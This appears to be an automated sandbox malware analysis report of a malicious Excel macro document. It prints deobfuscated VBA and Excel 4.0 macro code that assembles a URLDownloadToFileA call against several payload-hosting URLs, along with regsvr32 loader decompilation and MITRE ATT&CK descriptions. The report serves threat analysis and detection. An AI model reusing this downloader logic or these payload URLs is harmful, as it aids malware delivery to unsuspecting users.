Replace("SET.NAME("w00",b0b)","?","http://salonprem.ru/op291r.rar") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","http://mmogollon.com.mx/hy9x6w.zip") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","https://www.gfischool.org/u4xbtzk.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","http://mmogollon.com.mx/hy9x6w.zip") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","https://dev.decentwebsites.com/n18bqnz9.zip") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","http://cooltcat.com/hiytvys.rar") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","https://datxanhgemskyworldvn.com/vis2005c3.zip") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)
Part of subcall function ecimovert@Module1: Int
Part of subcall function ecimovert@Module1: UBound
Part of subcall function ecimovert@Module1: Rnd
Split
MsgBox
Run	Run("moreP_ab") Run("moreP_ab")

Strings	Decrypted Strings
"!"
""""
"="
"?"
"="
"?"
""""

Line	Instruction	Meta Information
7	Function pagesREviewsd(optional wq as Integer) as Integer
8	Dim O as Integer	executed
8	Dim Oa as Integer
8	ol = 1
9	Sheets(ol).Cells(homepodd, ol).Name = bycilke & "ab"	Cells
10	Dim MiV(44563)
11	For Each sem in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)	SpecialCells xlCellTypeConstants
12	MiV(sem.value) = Chr(sem.Row)	value Chr Row
13	Next	SpecialCells xlCellTypeConstants
14	For Each nog in MiV
15	govs = govs + nog
16	Next
17	Oa = 9
17	kij = Split(govs, "!")	Split
17	Ada = Split(kij(ol), yellowsto(homepodd))	Split
18	For Each Vo in Ada
19	Sheets(ol).Cells(homepodd, ol).value = "=" & Replace(Vo, "?", ecimovert(Split(kij(0), yellowsto(Oa))))	Cells Replace("SET.NAME("b0b",CHAR(101))","?","http://omescortcargo.com/jzj2gw.zip") -> SET.NAME("b0b",CHAR(101)) Split executed
20	On Error Resume Next
21	MsgBox (Run("" & bycilke & "ab"))	MsgBox Run("moreP_ab") executed
22	Next
22	Oa = 2
23	End Function

Function yellowsto, APIs: 0, Strings: 3, Number of lines: 6, Relevance: 3.756

Strings	Decrypted Strings
"$"
"]"
"]"

Line	Instruction	Meta Information
33	Function yellowsto(yel as Integer)
34	yellowsto = "$"	executed
35	If yel = 2 Then
35	yellowsto = "]"
35	Endif
36	End Function

Function ecimovert, APIs: 3, Strings: 0, Number of lines: 5, Relevance: 3.755

APIs	Meta Information
Int
UBound
Rnd

Line	Instruction	Meta Information
27	Function ecimovert(nimo as Variant) as String
27	Randomize:	executed
28	df = 2 - 1
28	ecimovert = nimo(Int((UBound(nimo) + df) * Rnd))	Int UBound Rnd
29	End Function

Function bycilke, APIs: 0, Strings: 1, Number of lines: 3, Relevance: 1.253

Strings	Decrypted Strings
"moreP_"

Line	Instruction	Meta Information
24	Function bycilke()
25	bycilke = "moreP_"	executed
26	End Function

Function homepodd, APIs: 0, Strings: 0, Number of lines: 3, Relevance: 0.003

Line	Instruction	Meta Information
3	Function homepodd()
4	homepodd = 5 - 3	executed
5	End Function

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "view_1_a, 1, 0, MSForms, MultiPage"

Executed Functions

Subroutine view_1_a_Layout, APIs: 2, Strings: 0, Number of lines: 4, Relevance: 4.504

APIs	Meta Information
Part of subcall function ResizePagess@Sheet1: OnTime
Part of subcall function ResizePagess@Sheet1: Now

Line	Instruction	Meta Information
13	Private Sub view_1_a_Layout(ByVal Index as Long)
14	a = 488	executed
14	ResizePagess
15	End Sub

Subroutine ResizePagess, APIs: 2, Strings: 1, Number of lines: 3, Relevance: 4.503

APIs	Meta Information
OnTime
Now

Strings	Decrypted Strings
"pages""REviewsd"

Line	Instruction	Meta Information
10	Sub ResizePagess()
11	Application.OnTime Now, "pages" & "REviewsd"	OnTime Now executed
12	End Sub

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: regsvr32.exe PID: 2504 Parent PID: 2500 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	77.1%
Signature Coverage:	25%
Total number of Nodes:	48
Total number of Limit Nodes:	5

Executed Functions

Function 0017B780, Relevance: 65.0, APIs: 3, Strings: 34, Instructions: 297
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0017B7D1
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0017B8D3
NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 0017BB1D

Strings

ntdll.dll, xrefs: 0017BAE5, 0017BAE8
c, xrefs: 0017BA65
P, xrefs: 0017BA95
S, xrefs: 0017BA89
i, xrefs: 0017BAB9
A, xrefs: 0017BABD
e, xrefs: 0017BAD5
r, xrefs: 0017BA6D
c, xrefs: 0017BAA1
r, xrefs: 0017BAC9
p, xrefs: 0017BAB5
s, xrefs: 0017BA5D
l, xrefs: 0017BA7D
d, xrefs: 0017BA79
D, xrefs: 0017BAB1
., xrefs: 0017BA75
t, xrefs: 0017BA91
e, xrefs: 0017BA71
l, xrefs: 0017BA81
o, xrefs: 0017BA9D
h, xrefs: 0017BA61
s, xrefs: 0017BAAD
s, xrefs: 0017BAD9
r, xrefs: 0017BA99
n, xrefs: 0017BAD1
e, xrefs: 0017BACD
a, xrefs: 0017BAC5
s, xrefs: 0017BADD
e, xrefs: 0017BA8D
s, xrefs: 0017BAA9
o, xrefs: 0017BA69
e, xrefs: 0017BAA5
NtSetInformationProcess, xrefs: 0017BAF7, 0017BAFA
w, xrefs: 0017BAC1

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID: AllocVirtual$InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 909339949-3052210031
Opcode ID: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction ID: dae061ad2fc2ca4923a5d4b97be216eaf72039a2cfbe41c8306fc087577e9fe4
Opcode Fuzzy Hash: 97769fb1da223d042207744e2717f0fc49578be2e3c1aaca9d71a9948057ec57
Instruction Fuzzy Hash: 46E12274D08289DFDB05CF98C484BDEBBB1BF59304F148158E5486F382C3BAA955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0017BA14, Relevance: 61.3, APIs: 1, Strings: 34, Instructions: 79
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtSetInformationProcess.NTDLL(000000FF,00000022,00000002,00000004), ref: 0017BB1D

Strings

ntdll.dll, xrefs: 0017BAE5, 0017BAE8
c, xrefs: 0017BA65
P, xrefs: 0017BA95
S, xrefs: 0017BA89
i, xrefs: 0017BAB9
A, xrefs: 0017BABD
e, xrefs: 0017BAD5
r, xrefs: 0017BA6D
c, xrefs: 0017BAA1
r, xrefs: 0017BAC9
p, xrefs: 0017BAB5
s, xrefs: 0017BA5D
l, xrefs: 0017BA7D
d, xrefs: 0017BA79
D, xrefs: 0017BAB1
., xrefs: 0017BA75
t, xrefs: 0017BA91
e, xrefs: 0017BA71
l, xrefs: 0017BA81
o, xrefs: 0017BA9D
h, xrefs: 0017BA61
s, xrefs: 0017BAAD
s, xrefs: 0017BAD9
r, xrefs: 0017BA99
n, xrefs: 0017BAD1
e, xrefs: 0017BACD
a, xrefs: 0017BAC5
s, xrefs: 0017BADD
e, xrefs: 0017BA8D
s, xrefs: 0017BAA9
o, xrefs: 0017BA69
e, xrefs: 0017BAA5
NtSetInformationProcess, xrefs: 0017BAF7, 0017BAFA
w, xrefs: 0017BAC1

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID: InformationProcess
String ID: .$A$D$NtSetInformationProcess$P$S$a$c$c$d$e$e$e$e$e$h$i$l$l$n$ntdll.dll$o$o$p$r$r$r$s$s$s$s$s$t$w
API String ID: 1801817001-3052210031
Opcode ID: 7a93e4dca30af2595c83838b26e0c91876fe79106ecb4432ae3e537336c9e689
Instruction ID: 3ea58ca47f9cd26e4c2f9127883ea3bd380a2292d7bb7f63c6b3286b2fbea5f7
Opcode Fuzzy Hash: 7a93e4dca30af2595c83838b26e0c91876fe79106ecb4432ae3e537336c9e689
Instruction Fuzzy Hash: 3B416B20D0C3C8D9EB12C6E8D4587DDBFB25B22748F18419895882F296C7FF1669C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 10002210, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 361
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E10002210() {
				long _v8;
				char* _v12;
				intOrPtr _v16;
				long _t374;
				intOrPtr _t536;

				_v16 = RegOpenKeyA;
				_v12 = "interface\\{b196b287-bab4-101a-b69c-00aa00341d07}";
				 *_v12 = 0x9c;
				 *_v12 = ( *_v12 & 0x000000ff) - 0x33;
				_v12[1] = 0xa1;
				_t9 =  &(_v12[1]); // 0x7265746e
				_v12[1] = ( *_t9 & 0x000000ff) - 0x33;
				_v12[2] = 0xa7;
				_t15 =  &(_v12[2]); // 0x66726574
				_v12[2] = ( *_t15 & 0x000000ff) - 0x33;
				_v12[3] = 0x98;
				_t21 =  &(_v12[3]); // 0x61667265
				_v12[3] = ( *_t21 & 0x000000ff) - 0x33;
				_v12[4] = 0xa5;
				_t27 =  &(_v12[4]); // 0x63616672
				_v12[4] = ( *_t27 & 0x000000ff) - 0x33;
				_v12[5] = 0x99;
				_t33 =  &(_v12[5]); // 0x65636166
				_v12[5] = ( *_t33 & 0x000000ff) - 0x33;
				_v12[6] = 0x94;
				_t39 =  &(_v12[6]); // 0x5c656361
				_v12[6] = ( *_t39 & 0x000000ff) - 0x33;
				_v12[7] = 0x96;
				_t45 =  &(_v12[7]); // 0x7b5c6563
				_v12[7] = ( *_t45 & 0x000000ff) - 0x33;
				_v12[8] = 0x98;
				_t51 =  &(_v12[8]); // 0x627b5c65
				_v12[8] = ( *_t51 & 0x000000ff) - 0x33;
				_v12[9] = 0x8f;
				_t57 =  &(_v12[9]); // 0x31627b5c
				_v12[9] = ( *_t57 & 0x000000ff) - 0x33;
				_v12[0xa] = 0xae;
				_t63 =  &(_v12[0xa]); // 0x3931627b
				_v12[0xa] = ( *_t63 & 0x000000ff) - 0x33;
				_v12[0xb] = 0x95;
				_t69 =  &(_v12[0xb]); // 0x36393162
				_v12[0xb] = ( *_t69 & 0x000000ff) - 0x33;
				_v12[0xc] = 0x64;
				_t75 =  &(_v12[0xc]); // 0x62363931
				_v12[0xc] = ( *_t75 & 0x000000ff) - 0x33;
				_v12[0xd] = 0x6c;
				_t81 =  &(_v12[0xd]); // 0x32623639
				_v12[0xd] = ( *_t81 & 0x000000ff) - 0x33;
				_v12[0xe] = 0x69;
				_t87 =  &(_v12[0xe]); // 0x38326236
				_v12[0xe] = ( *_t87 & 0x000000ff) - 0x33;
				_v12[0xf] = 0x95;
				_t93 =  &(_v12[0xf]); // 0x37383262
				_v12[0xf] = ( *_t93 & 0x000000ff) - 0x33;
				_v12[0x10] = 0x65;
				_v12[0x10] = (_v12[0x10] & 0x000000ff) - 0x33;
				_v12[0x11] = 0x6b;
				_v12[0x11] = (_v12[0x11] & 0x000000ff) - 0x33;
				_v12[0x12] = 0x6a;
				_v12[0x12] = (_v12[0x12] & 0x000000ff) - 0x33;
				_v12[0x13] = 0x60;
				_v12[0x13] = (_v12[0x13] & 0x000000ff) - 0x33;
				_v12[0x14] = 0x95;
				_v12[0x14] = (_v12[0x14] & 0x000000ff) - 0x33;
				_v12[0x15] = 0x94;
				_v12[0x15] = (_v12[0x15] & 0x000000ff) - 0x33;
				_v12[0x16] = 0x95;
				_v12[0x16] = (_v12[0x16] & 0x000000ff) - 0x33;
				_v12[0x17] = 0x67;
				_v12[0x17] = (_v12[0x17] & 0x000000ff) - 0x33;
				_v12[0x18] = 0x60;
				_v12[0x18] = (_v12[0x18] & 0x000000ff) - 0x33;
				_v12[0x19] = 0x64;
				_v12[0x19] = (_v12[0x19] & 0x000000ff) - 0x33;
				_v12[0x1a] = 0x63;
				_v12[0x1a] = (_v12[0x1a] & 0x000000ff) - 0x33;
				_v12[0x1b] = 0x64;
				_v12[0x1b] = (_v12[0x1b] & 0x000000ff) - 0x33;
				_v12[0x1c] = 0x94;
				_v12[0x1c] = (_v12[0x1c] & 0x000000ff) - 0x33;
				_v12[0x1d] = 0x60;
				_v12[0x1d] = (_v12[0x1d] & 0x000000ff) - 0x33;
				_v12[0x1e] = 0x95;
				_v12[0x1e] = (_v12[0x1e] & 0x000000ff) - 0x33;
				_v12[0x1f] = 0x69;
				_v12[0x1f] = (_v12[0x1f] & 0x000000ff) - 0x33;
				_v12[0x20] = 0x6c;
				_v12[0x20] = (_v12[0x20] & 0x000000ff) - 0x33;
				_v12[0x21] = 0x96;
				_v12[0x21] = (_v12[0x21] & 0x000000ff) - 0x33;
				_v12[0x22] = 0x60;
				_v12[0x22] = (_v12[0x22] & 0x000000ff) - 0x33;
				_v12[0x23] = 0x63;
				_v12[0x23] = (_v12[0x23] & 0x000000ff) - 0x33;
				_v12[0x24] = 0x63;
				_v12[0x24] = (_v12[0x24] & 0x000000ff) - 0x33;
				_v12[0x25] = 0x94;
				_v12[0x25] = (_v12[0x25] & 0x000000ff) - 0x33;
				_v12[0x26] = 0x94;
				_v12[0x26] = (_v12[0x26] & 0x000000ff) - 0x33;
				_v12[0x27] = 0x63;
				_v12[0x27] = (_v12[0x27] & 0x000000ff) - 0x33;
				_v12[0x28] = 0x63;
				_v12[0x28] = (_v12[0x28] & 0x000000ff) - 0x33;
				_v12[0x29] = 0x66;
				_v12[0x29] = (_v12[0x29] & 0x000000ff) - 0x33;
				_v12[0x2a] = 0x67;
				_v12[0x2a] = (_v12[0x2a] & 0x000000ff) - 0x33;
				_v12[0x2b] = 0x64;
				_v12[0x2b] = (_v12[0x2b] & 0x000000ff) - 0x33;
				_v12[0x2c] = 0x97;
				_v12[0x2c] = (_v12[0x2c] & 0x000000ff) - 0x33;
				_v12[0x2d] = 0x63;
				_v12[0x2d] = (_v12[0x2d] & 0x000000ff) - 0x33;
				_v12[0x2e] = 0x6a;
				_v12[0x2e] = (_v12[0x2e] & 0x000000ff) - 0x33;
				_v12[0x2f] = 0xb0;
				_v12[0x2f] = (_v12[0x2f] & 0x000000ff) - 0x33;
				E100010E0(_v12);
				_t536 =  *0x10008000; // 0x80074ea8
				_t374 = RegOpenKeyA(_t536 - 0x74ea8, _v12, 0x10009b38);
				_v8 = _t374;
				if(_v8 != 0) {
					while(1) {
						_t374 = 1;
						if(1 == 0) {
							goto L4;
						}
					}
				}
				L4:
				return _t374;
			}

0x1000221b
0x1000221e
0x10002228
0x10002237
0x1000223c
0x10002243
0x1000224d
0x10002253
0x1000225a
0x10002264
0x1000226a
0x10002271
0x1000227b
0x10002281
0x10002288
0x10002292
0x10002298
0x1000229f
0x100022a9
0x100022af
0x100022b6
0x100022c0
0x100022c6
0x100022cd
0x100022d7
0x100022dd
0x100022e4
0x100022ee
0x100022f4
0x100022fb
0x10002305
0x1000230b
0x10002312
0x1000231c
0x10002322
0x10002329
0x10002333
0x10002339
0x10002340
0x1000234a
0x10002350
0x10002357
0x10002361
0x10002367
0x1000236e
0x10002378
0x1000237e
0x10002385
0x1000238f
0x10002395
0x100023a6
0x100023ac
0x100023bd
0x100023c3
0x100023d4
0x100023da
0x100023eb
0x100023f1
0x10002402
0x10002408
0x10002419
0x1000241f
0x10002430
0x10002436
0x10002447
0x1000244d
0x1000245e
0x10002464
0x10002475
0x1000247b
0x1000248c
0x10002492
0x100024a3
0x100024a9
0x100024ba
0x100024c0
0x100024d1
0x100024d7
0x100024e8
0x100024ee
0x100024ff
0x10002505
0x10002516
0x1000251c
0x1000252d
0x10002533
0x10002544
0x1000254a
0x1000255b
0x10002561
0x10002572
0x10002578
0x10002589
0x1000258f
0x100025a0
0x100025a6
0x100025b7
0x100025bd
0x100025ce
0x100025d4
0x100025e5
0x100025eb
0x100025fc
0x10002602
0x10002613
0x10002619
0x1000262a
0x10002630
0x10002641
0x10002647
0x10002658
0x1000265e
0x1000266f
0x10002672
0x10002682
0x1000268f
0x10002692
0x10002699
0x1000269b
0x1000269b
0x100026a2
0x00000000
0x00000000
0x100026a4
0x1000269b
0x100026a9
0x100026a9

APIs

RegOpenKeyA.ADVAPI32(80000000,00000065,10009B38), ref: 1000268F

Strings

interface\{b196b287-bab4-101a-b69c-00aa00341d07}, xrefs: 1000221E

Memory Dump Source

Source File: 00000004.00000002.2385523862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2385515413.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2385541977.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2385545876.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2385549674.000000001000A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Open
String ID: interface\{b196b287-bab4-101a-b69c-00aa00341d07}
API String ID: 71445658-3721302963
Opcode ID: a18c97af28e285813de89cfeb4bd9988098e7b77b0fc30533ad912052d59e08e
Instruction ID: c6951cc353b31ba87cd3a8c2a3eed89061f0309c9faa39509d095e1b46e835f6
Opcode Fuzzy Hash: a18c97af28e285813de89cfeb4bd9988098e7b77b0fc30533ad912052d59e08e
Instruction Fuzzy Hash: F212FB35A083C99FCB05CFA8C19499CFFB26F56220F1882C9D4D56B387C671D696CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017B1B0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0017B234

Strings

VirtualAlloc, xrefs: 0017B219, 0017B21C

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction ID: c2c309240f9077bd5e3ff21e9dc7adac32bff068acc2dac8630144f4dc197d00
Opcode Fuzzy Hash: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction Fuzzy Hash: 9D114260D082CDDEEF01D7E88449BEFBFB55F21704F044098D5486B282D7BA575887B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10002140, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			E10002140() {
				intOrPtr _t1;

				_t1 =  *0x10009ac0; // 0x3c400
				 *0x10009b2c = _t1;
				 *0x10009b30 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAlloc");
				_push(0x40);
				_push(0x3000);
				_push( *0x10009b2c);
				_push( *0x10009b0c);
				_push( *0x10009b30);
				_push(E100021B7);
				_push( *0x10009b30);
				return 0x40;
			}

0x10002143
0x10002148
0x10002164
0x1000216e
0x10002174
0x10002175
0x1000217b
0x10002181
0x100021b0
0x100021b5
0x100021b6

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 10002157
GetProcAddress.KERNEL32(00000000,?,1000271F,00001EB1), ref: 1000215E

Strings

kernel32, xrefs: 10002152
VirtualAlloc, xrefs: 1000214D

Memory Dump Source

Source File: 00000004.00000002.2385523862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2385515413.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2385541977.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2385545876.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2385549674.000000001000A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualAlloc$kernel32
API String ID: 2574300362-401495515
Opcode ID: ca5a060d124779540984de058d4df12cdfc5e79f77677895b9c505c6431e535c
Instruction ID: 19a47b1fde89a997c736c432cacfc160cd944b27a30909c0373f33c784965bd1
Opcode Fuzzy Hash: ca5a060d124779540984de058d4df12cdfc5e79f77677895b9c505c6431e535c
Instruction Fuzzy Hash: 55E01AF9110220AFFB45DB68ED94E613BA9F74C2E0B008128FA81D32A8D7316A00CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0017B5D0, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction ID: d690dafd8f6e1853e4d5d83d74883e5dbd1a6bb244d9394b4544eaccc54023bc
Opcode Fuzzy Hash: cf548487ecdd725beb7112b753b83674412ce8520bb0d827a04225be527046e3
Instruction Fuzzy Hash: 7331E870A0810ACBCB58CF44C1D47BEB7B2BF44715F75C559E90AAB290D374AE81DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017B6E0, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction ID: bd33d1aff94b2e87f3ee0777c7a83746f62526929196ed9a499b95f14dc6f85a
Opcode Fuzzy Hash: 5b42eeaf083fbd2ff8aff7e5200a30b42e2d1e1024dde0e63d92a7892f32080c
Instruction Fuzzy Hash: B3118A78A04248DFCB48CF54C0D0B9DBBB1EF88310F618599E84997790D731EE81CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001588DD, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2381774707.0000000000140000.00000040.00000001.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction ID: cbe2a02f61b9852af6e581df0cc5d47b17fb42662d36516be15224a3a91d8b2a
Opcode Fuzzy Hash: dae8bae5d266d933eed9766570152b5a2e541bf3027ad2889f23a334d90eea72
Instruction Fuzzy Hash: 02012BB6808BE5CFC7029F34C80559A3B20AE872307594399E9B12F2E6CB219417CB95

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

